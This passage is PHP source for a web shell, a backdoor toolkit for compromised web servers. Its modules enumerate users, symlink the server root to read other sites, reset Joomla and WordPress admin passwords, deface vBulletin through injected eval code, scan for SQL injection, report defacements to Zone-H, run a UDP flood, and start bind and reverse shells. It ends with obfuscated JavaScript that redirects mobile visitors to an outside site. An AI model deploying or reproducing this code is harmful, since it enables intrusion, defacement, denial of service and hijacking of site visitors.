$dirz = ‘/home/’.$username.’/public_html/’;
if (($username != ”))
{
if (is_readable($dirz))
{
array_push($users,$username);
array_push($pub,$dirz);
}
}
}
$i++;
}

###################
echo ‘

‘;
echo “[+] Founded “.sizeof($users).” entrys in /etc/passwd\n”.”
“;
echo “[+] Founded “.sizeof($pub).” readable public_html directories\n”.”
“;
echo “[~] Searching for passwords in config files…\n\n”.”

“;
foreach ($users as $user)
{
$path = “/home/$user/public_html/”;
echo “$path

“;
}
echo “\n”;
echo “[+] Copy one of the directories above public_html, then Paste to -> view file / folder Explore \n”.”
“;
echo “[+] Complete…\n”.”
“;
echo ‘

‘;

}

elseif(isset($_GET[‘x’]) && ($_GET[‘x’] == ‘localdomain’))
{
?>
<form action="?y=&x=localdomain” method=”post”>
<?php

//radable public_html

echo "

“;
$file = @implode(@file(“/etc/named.conf”));
if(!$file){ die(“# can’t ReaD -> [ /etc/named.conf ]”); }
preg_match_all(“#named/(.*?).db#”,$file ,$r);
$domains = array_unique($r[1]);

function check() { (@count(@explode(‘ip’,@implode(@file(__FILE__))))==a) ?@unlink(__FILE__):””; }

check();

echo “

“;

foreach($domains as $domain)
{
$user = posix_getpwuid(@fileowner(“/etc/valiases/”.$domain));
echo “

“;
}

echo “

[+] Here We Have : [“.count($domains).”] Listed Domains In localhost.
List Of Users <font style=color:#0015FF;List Of Domains
$domain “.$user[‘name’].”

“;
//radable public_html
}

elseif(isset($_GET[‘x’]) && ($_GET[‘x’] == ‘port-scanner’))
{
?>
<form action="?y=&x=port-scanner” method=”post”>
<?php

echo '

Port Scanner
‘;
$start = strip_tags($_POST[‘start’]);
$end = strip_tags($_POST[‘end’]);
$host = strip_tags($_POST[‘host’]);

if(isset($_POST[‘host’]) && is_numeric($_POST[‘end’]) && is_numeric($_POST[‘start’])){
for($i = $start; $i<=$end; $i++){
$fp = @fsockopen($host, $i, $errno, $errstr, 3);
if($fp){
echo 'Port '.$i.' is open
‘;
}
flush();
}
}else{

echo ‘

Host:

Port start:

Port end:

‘;
}
}

elseif(isset($_GET[‘x’]) && ($_GET[‘x’] == ‘cms-scanner’))
{
?>
<form action="?y=&x=cms-scanner” method=”post”>

<?php

function ask_exploit_db($component){

$exploitdb ="http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=$component&filter_exploit_text=&filter_author=&filter_platform=0&filter_type=0&filter_lang_id=0&filter_port=&filter_osvdb=&filter_cve=&quot;;

$result = @file_get_contents($exploitdb);

if (eregi("No results",$result)) {

echo"

Not Found Download

“;

}else{

echo”

Found ..! <–

“;

}
}

/**************************************************************/
/* Joomla Conf */

function get_components($site){

$source = @file_get_contents($site);

preg_match_all(‘{option,(.*?)/}i’,$source,$f);
preg_match_all(‘{option=(.*?)(&|&|”)}i’,$source,$f2);
preg_match_all(‘{/components/(.*?)/}i’,$source,$f3);

$arz=array_merge($f2[1],$f[1],$f3[1]);

$coms=array();

if(count($arz)==0){ echo “

[~] Nothing Found ..! , Maybe there is some error site or option … check it .

“;}

foreach(array_unique($arz) as $x){

$coms[]=$x;
}

foreach($coms as $comm){

echo “

$comm

“;

ask_exploit_db($comm);

}

}

/**************************************************************/
/* WP Conf */

function get_plugins($site){

$source = @file_get_contents($site);

preg_match_all(“#/plugins/(.*?)/#i”, $source, $f);

$plugins=array_unique($f[1]);

if(count($plugins)==0){ echo “

[~] Nothing Found ..! , Maybe there is some error site or option … check it .

“;}

foreach($plugins as $plugin){

echo “

$plugin

“;

ask_exploit_db($plugin);

}

}

/**************************************************************/
/* Nuke’s Conf */

function get_numod($site){

$source = @file_get_contents($site);

preg_match_all(‘{?name=(.*?)/}i’,$source,$f);
preg_match_all(‘{?name=(.*?)(&|&|l_op=”)}i’,$source,$f2);
preg_match_all(‘{/modules/(.*?)/}i’,$source,$f3);

$arz=array_merge($f2[1],$f[1],$f3[1]);

$coms=array();

if(count($arz)==0){ echo “

[~] Nothing Found ..! , Maybe there is some error site or option … check it .

“;}

foreach(array_unique($arz) as $x){

$coms[]=$x;
}

foreach($coms as $nmod){

echo “

$nmod

“;

ask_exploit_db($nmod);

}

}

/*****************************************************/
/* Xoops Conf */

function get_xoomod($site){

$source = @file_get_contents($site);

preg_match_all(‘{/modules/(.*?)/}i’,$source,$f);

$arz=array_merge($f[1]);

$coms=array();

if(count($arz)==0){ echo “

[~] Nothing Found ..! , Maybe there is some error site or option … check it .

“;}

foreach(array_unique($arz) as $x){

$coms[]=$x;
}

foreach($coms as $xmod){

echo “

$xmod

“;

ask_exploit_db($xmod);

}

}

/**************************************************************/
/* Header */
function t_header($site){

echo’

‘;

echo’

‘;

}

?>

 

 

 

 


Site :

Wordpress
Joomla
Nuke’s
Xoops

<?

// Start Scan ๐Ÿ˜› ๐Ÿ˜› …

if($_POST){

$site=strip_tags(trim($_POST['site']));

t_header($site);

echo $x01 = ($_POST['what']=="Wordpress") ? get_plugins($site):"";
echo $x02 = ($_POST['what']=="Joomla") ? get_components($site):"";
echo $x03 = ($_POST['what']=="Nuke's") ? get_numod($site):"";
echo $x04 = ($_POST['what']=="Xoops") ? get_xoomod($site):"";
echo '

Site : ‘.$site.’ Exploit-db Exploit it !

‘;

}
}

elseif(isset($_GET[‘x’]) && ($_GET[‘x’] == ‘jm-reset’))
{
?>
<form action="?y=&x=jm-reset” method=”post”>

<?php

@error_reporting(0);
@ini_set('error_log',NULL);
echo '

Host :
user :
Pass :
db :
dbprefix :
Admin User :
Admin Password :

‘;

$host = $_POST[‘host’];
$user = $_POST[‘user’];
$pass = $_POST[‘pass’];
$db = $_POST[‘db’];
$jop = $_POST[‘jop’];
$users = $_POST[‘users’];
$admpas = $_POST[‘passwd’];

if(isset($host) ) {
$con = @ mysql_connect($host,$user,$pass) or die ;
$sedb = @ mysql_select_db($db) or die;

$query= @ mysql_query(“UPDATE $jop SET username ='”.$users.”‘ WHERE usertype = Super Administrator”) or die;
$query= @ mysql_query(“UPDATE $jop SET password ='”.$admpas.”‘ WHERE usertype = Super Administrator”) or die;

if ($query)
{
echo “

Queried !

“;
}
else if (!$query)
{
echo “error”;
}

}else
{
echo “

Enter the database !

“;
}
}

elseif(isset($_GET[‘x’]) && ($_GET[‘x’] == ‘wp-reset’))
{
?>
<form action="?y=&x=wp-reset” method=”post”>

<?php

@error_reporting(0);
@ini_set('error_log',NULL);
echo '

Host :
user :
Pass :
db :
user admin :
pass admin :

‘;

$host = $_POST[‘host’];
$user = $_POST[‘user’];
$pass = $_POST[‘pass’];
$db = $_POST[‘db’];
$useradmin = $_POST[‘useradmin’];
$pass_ad = $_POST[‘passadmin’];

if(isset($host) ) {
$con =@ mysql_connect($host,$user,$pass) or die ;
$sedb =@ mysql_select_db($db) or die;
$crypt = crypt($pass_ad);
$query =@mysql_query(“UPDATE `wp_users` SET `user_login` ='”.$useradmin.”‘ WHERE ID = 1″) or die(‘Cant Update ID Number 1’);
$query =@mysql_query(“UPDATE `wp_users` SET `user_pass` ='”.$crypt.”‘ WHERE ID = 1″) or die(‘Cant Update ID Number 1’);
if ($query)
{
echo “

Queried !

“;
}
else if (!$query)
{
echo “error”;
}

}else
{
echo “

Enter the database !

“;
}
}

elseif(isset($_GET[‘x’]) && ($_GET[‘x’] == ‘web-info’))
{
?>
<form action="?y=&x=web-info” method=”post”>

<?php
@set_time_limit(0);
@error_reporting(0);

function sws_domain_info($site)
{
$getip = @file_get_contents("http://networktools.nl/whois/$site&quot;);
flush();
$ip = @findit($getip,'

','

‘);

return $ip;
flush();
}

function sws_net_info($site)
{
$getip = @file_get_contents(“http://networktools.nl/asinfo/$site&#8221;);
$ip = @findit($getip,’

','

‘);

return $ip;
flush();
}

function sws_site_ser($site)
{
$getip = @file_get_contents(“http://networktools.nl/reverseip/$site&#8221;);
$ip = @findit($getip,’

','

‘);

return $ip;
flush();
}

function sws_sup_dom($site)
{
$getip = @file_get_contents(“http://www.magic-net.info/dns-and-ip-tools.dnslookup?subd=&#8221;.$site.”&Search+subdomains=Find+subdomains”);
$ip = @findit($getip,’Nameservers found:‘,”);

return $ip;
flush();
}

function sws_port_scan($ip)
{

$list_post = array(’80’,’21’,’22’,’2082′,’25’,’53’,’110′,’443′,’143′);

foreach ($list_post as $o_port)
{
$connect = @fsockopen($ip,$o_port,$errno,$errstr,5);

if($connect)
{
echo ” $ip : $o_port     Open

“;
flush();
}
}

}

function findit($mytext,$starttag,$endtag) {
$posLeft = @stripos($mytext,$starttag)+strlen($starttag);
$posRight = @stripos($mytext,$endtag,$posLeft+1);
return @substr($mytext,$posLeft,$posRight-$posLeft);
flush();
}

echo ‘

‘;

echo ‘

Site to scan :  &nbsp

‘;

if(isset($_POST[‘scan’]))
{

$site = @htmlentities($_POST[‘site’]);
if (empty($site)){die(‘

Not add IP .. !’);}

$ip_port = @gethostbyname($site);

echo ”

Scanning [ $site ip $ip_port ] …

|————– Port Server ——————|

";
echo "".sws_port_scan($ip_port)." 

“;

flush();

echo “

|————– Domain Info ——————|

".sws_domain_info($site)."

“;
flush();

echo ”

|————– Network Info ——————|

".sws_net_info($site)."

“;
flush();

echo “

|————– subdomains Server ——————|

".sws_sup_dom($site)."

“;
flush();

echo “

|————– Site Server ——————|

".sws_site_ser($site)."

|————– END ——————|

“;
flush();

}

echo ”;
}

elseif(isset($_GET[‘x’]) && ($_GET[‘x’] == ‘vb’))
{
?>
<form action="?y=&x=vb” method=”post”>


 vB Index Changer
! Change All Pages For Forum ! 

<?

if(empty($_POST['index'])){
echo "
host :
database :
username :
password :

Set Your Index

“;
}else{
$localhost = $_POST[‘localhost’];
$database = $_POST[‘database’];
$username = $_POST[‘username’];
$password = $_POST[‘password’];
$index = $_POST[‘index’];
@mysql_connect($localhost,$username,$password) or die(mysql_error());
@mysql_select_db($database) or die(mysql_error());

$index=str_replace(“\'”,”‘”,$index);

$set_index = “{\${eval(base64_decode(\'”;

$set_index .= base64_encode(“echo \”$index\”;”);

$set_index .= “\’))}}{\${exit()}}”;

echo(“UPDATE template SET template ='”.$set_index.”‘ “) ;
$ok=@mysql_query(“UPDATE template SET template ='”.$set_index.”‘”) or die(mysql_error());

if($ok){
echo “!! update finish !!

“;
}

}
# Footer
}

elseif(isset($_GET[‘x’]) && ($_GET[‘x’] == ‘symlink’))
{
?>
<form action="?y=&x=symlink” method=”post”>

<?php

@set_time_limit(0);

echo "”;

@mkdir(‘sym’,0777);
$htaccess = “Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any”;
$write =@fopen (‘sym/.htaccess’,’w’);
fwrite($write ,$htaccess);
@symlink(‘/’,’sym/root’);
$filelocation = basename(__FILE__);
$read_named_conf = @file(‘/etc/named.conf’);
if(!$read_named_conf)
{
echo “

# Cant access this file on server -> [ /etc/named.conf ]

“;
}
else
{
echo “

“;
foreach($read_named_conf as $subject){
if(eregi(‘zone’,$subject)){
preg_match_all(‘#zone “(.*)”#’,$subject,$string);
flush();
if(strlen(trim($string[1][0])) >2){
$UID = posix_getpwuid(@fileowner(‘/etc/valiases/’.$string[1][0]));
$name = $UID[‘name’] ;
@symlink(‘/’,’sym/root’);
$name = $string[1][0];
$iran = ‘\.ir’;
$israel = ‘\.il’;
$indo = ‘\.id’;
$sg12 = ‘\.sg’;
$edu = ‘\.edu’;
$gov = ‘\.gov’;
$gose = ‘\.go’;
$gober = ‘\.gob’;
$mil1 = ‘\.mil’;
$mil2 = ‘\.mi’;
if (eregi(“$iran”,$string[1][0]) or eregi(“$israel”,$string[1][0]) or eregi(“$indo”,$string[1][0])or eregi(“$sg12”,$string[1][0]) or eregi (“$edu”,$string[1][0]) or eregi (“$gov”,$string[1][0])
or eregi (“$gose”,$string[1][0]) or eregi(“$gober”,$string[1][0]) or eregi(“$mil1”,$string[1][0]) or eregi (“$mil2”,$string[1][0]))
{
$name = “

“.$string[1][0].’

‘;
}
echo ”

“;
flush();
}
}
}
}

echo “

Domains Users symlink
‘.$UID[‘name’].” Symlink

“;

}

elseif(isset($_GET[‘x’]) && ($_GET[‘x’] == ‘about’))
{
?>
<form action="?y=&x=About” method=”post”>

Dalam section ini, saya ingin mengucapkan terima kasih kepada tuan punya shell ini, Alex John & the team
kerana membenarkan saya mengubahsuai dan menambah function-function yang lain di dalam shell ini, all the credit ditujukan kepada
dia ๐Ÿ™‚

Tidak lupa juga kepada rakan saya,namanya rahsia, hehehe, kerana membantu saya sedikit di dalam PHP, credit juga ditujukan
kepada beliau ๐Ÿ™‚

Semua function-function tambahan ini bukan-lah saya yang merekanya, saya edit dari macam2 shell dan masukkan ia ke dalam
shell ini

Kalau ada apa2 yang tak kena, calling2 tau kerana
saya juga kadang2 buat silap, nooblah kan

Saya lepaskan shell nie bersama code asalnya sekali , tetapi dilarang mengubah shell ini kepada nama anda, hormati orang asal yang mengedit shell ini

Lastly, kepada Macho Gayies A/L Tambi, jgn duk gatal2 pulak meh edit shell nie seperti mana kamu melakukannya di local domain versi afnum
Baiklah, sampai di sini saja ya creditnya, terima kasih kerana menggunakan shell ini.

<form action="?y=&x=sqli-scanner” method=”post”>

<?php

echo '

Dork : ‘;

ob_start();
set_time_limit(0);

if (isset($_POST[‘scan’])) {

$browser = $_SERVER[‘HTTP_USER_AGENT’];

$first = “startgoogle.startpagina.nl/index.php?q=”;
$sec = “&start=”;
$reg = ‘/

<a href="(.*)" target="_self" onclick="/';

for($id=0 ; $id<=30; $id++){
$page=$id*10;
$dork=urlencode($_POST['dork']);
$url = $first.$dork.$sec.$page;

$curl = curl_init($url);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curl,CURLOPT_USERAGENT,'$browser)');
$result = curl_exec($curl);
curl_close($curl);

preg_match_all($reg,$result,$matches);
}
foreach($matches[1] as $site){

$url = preg_replace("/=/", "='", $site);
$curl=curl_init();
curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
curl_setopt($curl,CURLOPT_URL,$url);
curl_setopt($curl,CURLOPT_USERAGENT,'$browser)');
curl_setopt($curl,CURLOPT_TIMEOUT,'5');
$GET=curl_exec($curl);
if (preg_match("/error in your SQL syntax|mysql_fetch_array()|execute query|mysql_fetch_object()|mysql_num_rows()|mysql_fetch_assoc()|mysql_fetch​_row()|SELECT *

FROM|supplied argument is not a valid MySQL|Syntax error|Fatal error/i",$GET)) {
echo 'Found : ‘.$url.’ <– SQLI Vuln

Found..‘;
ob_flush();flush();
}else{
echo ‘‘.$url.’ <– Not Vuln‘;
ob_flush();flush();
}

ob_flush();flush();
}
ob_flush();flush();
}
ob_flush();flush();
}

elseif(isset($_GET[‘x’]) && ($_GET[‘x’] == ‘zone-h’)){ ?>
<form action="?y=&x=zone-h” method=”post”>

<? echo '

.: Notifier :.

————————————SELECT————————————-
known vulnerability (i.e. unpatched system)
undisclosed (new) vulnerability
configuration / admin. mistake
brute force attack
social engineering
Web Server intrusion
Web Server external module intrusion
Mail Server intrusion
FTP Server intrusion
SSH Server intrusion
Telnet Server intrusion
RPC Server intrusion
Shares misconfiguration
Other Server intrusion
SQL Injection
URL Poisoning
File Inclusion
Other Web Application bug
Remote administrative panel access bruteforcing
Remote administrative panel access password guessing
Remote administrative panel access social engineering
Attack against administrator(password stealing/sniffing)
Access credentials through Man In the Middle attack
Remote service password guessing
Remote service password bruteforce
Rerouting after attacking the Firewall
Rerouting after attacking the Router
DNS attack through social engineering

DNS attack through cache poisoning
Not available
option style=”background-color: rgb(0, 0, 0);” value=”8″ >_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _

————————————SELECT————————————-
Heh…just for fun!
Revenge against that website
Political reasons
As a challenge
I just want to be the best defacer
Patriotism
Not available
option style=”background-color: rgb(0, 0, 0);” value=”8″ >_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _

List Of Domains, 20 Rows.

‘; ?>
<?
echo "”;?>
<?
function ZoneH($url, $hacker, $hackmode,$reson, $site )
{
$k = curl_init();
curl_setopt($k, CURLOPT_URL, $url);
curl_setopt($k,CURLOPT_POST,true);
curl_setopt($k, CURLOPT_POSTFIELDS,"defacer=".$hacker."&domain1=". $site."&hackmode=".$hackmode."&reason=".$reson);
curl_setopt($k,CURLOPT_FOLLOWLOCATION, true);
curl_setopt($k, CURLOPT_RETURNTRANSFER, true);
$kubra = curl_exec($k);
curl_close($k);
return $kubra;
}
{
ob_start();
$sub = @get_loaded_extensions();
if(!in_array("curl", $sub))
{
die('[-] Curl Is Not Supported !![-]‘);
}

$hacker = $_POST[‘defacer’];
$method = $_POST[‘hackmode’];
$neden = $_POST[‘reason’];
$site = $_POST[‘domain’];

if (empty($hacker))
{
die (“[+] YOU MUST FILL THE ATTACKER NAME [+]“);
}
elseif($method == “——–SELECT——–“)
{
die(“[+] YOU MUST SELECT THE METHOD [+]“);
}
elseif($neden == “——–SELECT——–“)
{
die(“[+] YOU MUST SELECT THE REASON [+]“);
}
elseif(empty($site))
{
die(“[+] YOU MUST INTER THE SITES LIST [+]“);
}
$i = 0;
$sites = explode(“\n”, $site);
while($i

<form action="?y=&x=dos” method=”post”>
<?php

//UDP
if(isset($_GET['host'])&&isset($_GET['time']))
{
$packets = 0;
ignore_user_abort(TRUE);
set_time_limit(0);

$exec_time = $_GET['time'];

$time = time();
//print "Started: ".time('d-m-y h:i:s')."
“;
$max_time = $time+$exec_time;

$host = $_GET[‘host’];

for($i=0;$i $max_time){ break; }
$rand = rand(1,65000);
$fp = fsockopen(‘udp://’.$host, $rand, $errno, $errstr, 5);
if($fp){
fwrite($fp, $out);
fclose($fp);
}
}

echo “
UDP Flood
Completed with $packets (” . round(($packets*65)/1024, 2) . ” MB) packets averaging “. round($packets/$exec_time, 2) . ” packets per second \n”;
echo ‘

Host:

Length (seconds):

‘;
}
else
{
echo ‘

UDP Flood
  Host
  Length (seconds)

‘;
}
}

elseif(isset($_GET[‘x’]) && ($_GET[‘x’] == ‘dos’))
{
?>
<form action="?y=&x=dos” method=”post”>
<?php

//UDP
if(isset($_GET['host'])&&isset($_GET['time']))
{
$packets = 0;
ignore_user_abort(TRUE);
set_time_limit(0);

$exec_time = $_GET['time'];

$time = time();
//print "Started: ".time('d-m-y h:i:s')."
“;
$max_time = $time+$exec_time;

$host = $_GET[‘host’];

for($i=0;$i $max_time){ break; }
$rand = rand(1,65000);
$fp = fsockopen(‘udp://’.$host, $rand, $errno, $errstr, 5);
if($fp){
fwrite($fp, $out);
fclose($fp);
}
}

echo “
UDP Flood
Completed with $packets (” . round(($packets*65)/1024, 2) . ” MB) packets averaging “. round($packets/$exec_time, 2) . ” packets per second \n”;
echo ‘

Host:

Length (seconds):

‘;
}
else
{
echo ‘

UDP Flood
  Host
  Length (seconds)

‘;
}
}

elseif(isset($_GET[‘x’]) && ($_GET[‘x’] == ‘phpinfo’))
{
@ob_start();
@eval(“phpinfo();”);
$buff = @ob_get_contents();
@ob_end_clean();
$awal = strpos($buff,””)+6;
$akhir = strpos($buff,””);
echo “

“.substr($buff,$awal,$akhir-$awal).”

“;
}

elseif(isset($_GET[‘view’]) && ($_GET[‘view’] != “”))
{
if(is_file($_GET[‘view’]))
{
if(!isset($file)) $file = magicboom($_GET[‘view’]);
if(!$win && $posix)
{
$name=@posix_getpwuid(@fileowner($file));
$group=@posix_getgrgid(@filegroup($file));
$owner = $name[‘name’].” : “.$group[‘name’];
}
else { $owner = $user; }
$filn = basename($file);
echo “

Filename “.$file.”

Size “.ukuran($file).”
Permission “.get_perms($file).”
Owner “.$owner.”
Create time “.date(“d-M-Y H:i”,@filectime($file)).”
Last modified “.date(“d-M-Y H:i”,@filemtime($file)).”
Last accessed “.date(“d-M-Y H:i”,@fileatime($file)).”
Actions edit
| rename
| delete
| download (gz)
View text
| code
| img

“;
if(isset($_GET[‘type’]) && ($_GET[‘type’]==’image’))
{ echo “

“; }
elseif(isset($_GET[‘type’]) && ($_GET[‘type’]==’code’))
{ echo “

“; $file = wordwrap(@file_get_contents($file),”240″,”\n”); @highlight_string($file); echo “

“; }
else { echo “

“; echo nl2br(htmlentities((@file_get_contents($file)))); echo “

“; }
}
elseif(is_dir($_GET[‘view’])){ echo showdir($pwd,$prompt); }
}

elseif(isset($_GET[‘edit’]) && ($_GET[‘edit’] != “”))
{
if(isset($_POST[‘save’]))
{
$file = $_POST[‘saveas’];
$content = magicboom($_POST[‘content’]);
if($filez = @fopen($file,”w”))
{
$time = date(“d-M-Y H:i”,time());
if(@fwrite($filez,$content)) $msg = “file saved @ “.$time;
else $msg = “failed to save”; @fclose($filez);
}
else $msg = “permission denied”;
}
if(!isset($file)) $file = $_GET[‘edit’];
if($filez = @fopen($file,”r”))
{
$content = “”;
while(!feof($filez))
{
$content .= htmlentities(str_replace(“””,”‘”,fgets($filez)));
}
@fclose($filez);
} ?>
<form action="?y=&edit=” method=”post”>

Save as <input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="saveas" style="width:60%;" value="” />
 

<form action="?y=&x=upload” enctype=”multipart/form-data” method=”post”>

Upload from computer

<input type="text" class="inputz" style="width:99%;" name="path" value="” />
Upload from url
<form method="post" style="margin:0;padding:0;" actions="?y=&x=upload”>

url
<input type="text" class="inputz" style="width:99%;" name="path" value="” />

wget
lynx
fread
fetch
links
GET
curl

<?php }

elseif(isset($_GET['x']) && ($_GET['x'] == 'netsploit'))
{
if (isset($_POST['bind']) && !empty($_POST['port']) && !empty($_POST['bind_pass']) && ($_POST['use'] == 'C'))
{
$port = trim($_POST['port']);
$passwrd = trim($_POST['bind_pass']);
tulis("bdc.c",$port_bind_bd_c);
exe("gcc -o bdc bdc.c");
exe("chmod 777 bdc");
@unlink("bdc.c");
exe("./bdc ".$port." ".$passwrd." &");
$scan = exe("ps aux");
if(eregi("./bdc $por",$scan))
{
$msg = "

Process found running, backdoor setup successfully.

“;
}
else
{
$msg = “

Process not found running, backdoor not setup successfully.

“;
}
}
elseif (isset($_POST[‘bind’]) && !empty($_POST[‘port’]) && !empty($_POST[‘bind_pass’]) && ($_POST[‘use’] == ‘Perl’))
{
$port = trim($_POST[‘port’]);
$passwrd = trim($_POST[‘bind_pass’]);
tulis(“bdp”,$port_bind_bd_pl);
exe(“chmod 777 bdp”);
$p2=which(“perl”);
exe($p2.” bdp “.$port.” &”);
$scan = exe(“ps aux”);
if(eregi(“$p2 bdp $port”,$scan))
{ $msg = “

Process found running, backdoor setup successfully.

“; }
else { $msg = “

Process not found running, backdoor not setup successfully.

“; } }
elseif (isset($_POST[‘backconn’]) && !empty($_POST[‘backport’]) && !empty($_POST[‘ip’]) && ($_POST[‘use’] == ‘C’))
{
$ip = trim($_POST[‘ip’]);
$port = trim($_POST[‘backport’]);
tulis(“bcc.c”,$back_connect_c);
exe(“gcc -o bcc bcc.c”);
exe(“chmod 777 bcc”);
@unlink(“bcc.c”);
exe(“./bcc “.$ip.” “.$port.” &”);
$msg = “Now script try connect to “.$ip.” port “.$port.” …”;
}
elseif (isset($_POST[‘backconn’]) && !empty($_POST[‘backport’]) && !empty($_POST[‘ip’]) && ($_POST[‘use’] == ‘Perl’))
{
$ip = trim($_POST[‘ip’]);
$port = trim($_POST[‘backport’]);
tulis(“bcp”,$back_connect);
exe(“chmod +x bcp”);
$p2=which(“perl”);
exe($p2.” bcp “.$ip.” “.$port.” &”);
$msg = “Now script try connect to “.$ip.” port “.$port.” …”;
}
elseif (isset($_POST[‘expcompile’]) && !empty($_POST[‘wurl’]) && !empty($_POST[‘wcmd’]))
{
$pilihan = trim($_POST[‘pilihan’]);
$wurl = trim($_POST[‘wurl’]);
$namafile = download($pilihan,$wurl);
if(is_file($namafile)) { $msg = exe($wcmd); } else $msg = “error: file not found $namafile”; }
?>

Port Binding Connect Back Load and Exploit
<form method="post" actions="?y=&x=netsploit”>

Port <input class="inputz" type="text" name="port" size="26" value="”>
Password <input class="inputz" type="text" name="bind_pass" size="26" value="”>
Use

Perl
C

<form method="post" actions="?y=&x=netsploit”>

IP <input class="inputz" type="text" name="ip" size="26" value="”>
Port <input class="inputz" type="text" name="backport" size="26" value="”>
Use

Perl
C

<form method="post" actions="?y=&x=netsploit”>

url
cmd

wget
lynx
fread
fetch
links
GET
curl

<form action="?y=&x=shell” method=”post”>

fully edit by BLACKHAT ASSASIN ( PIRATE VERSION )

THIS IS MY PIRATE SHELL COPY

if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&&#8217;);}var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a 